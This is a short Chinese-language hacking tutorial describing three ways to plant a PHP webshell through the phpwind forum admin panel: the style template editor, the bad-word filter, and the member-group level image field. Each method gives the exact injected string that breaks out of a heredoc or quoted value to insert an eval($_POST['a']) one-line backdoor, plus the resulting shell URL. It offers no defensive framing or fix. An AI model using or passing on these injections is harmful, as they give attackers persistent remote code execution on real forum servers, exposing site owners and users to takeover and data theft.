phpwind 从后台拿webshell的三种方式

进入后台， 风格模版设置 ，在随便一行写代码
记住，这代码必须顶着左边行写，代码前面不可以有任何字符。
EOT;
eval($a);
print <<

例如，我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST['a']);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}

而后得到一个shell
http://localhost/bbs/index.php
（由于写到css里，也许有的操作无法返回，但是只要没有什么问题，一般操作都是可以接受的）
密码是a lanker的一句话后门。

方式2 脏话过滤法

进入安全管理 ◇ 不良词语过滤

新增
不良词语写 a']='aa';eval($_POST['a']);//
替换为那里可以随意写

而后得到一个shell地址为
http://localhost/bbs/data/bbscache/wordsfb.php

密码是a lanker的一句话后门。

方式3 用户等级管理
然后新建立会员组
头衔你可以随便写，但是千万不要写单双引号特殊符号，升级图片号写a';eval($_POST['a']);//
升级点数依然可以随意写。

而后得到一个shell地址为
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。

这里提供的方式随便你选一种都可以得到shell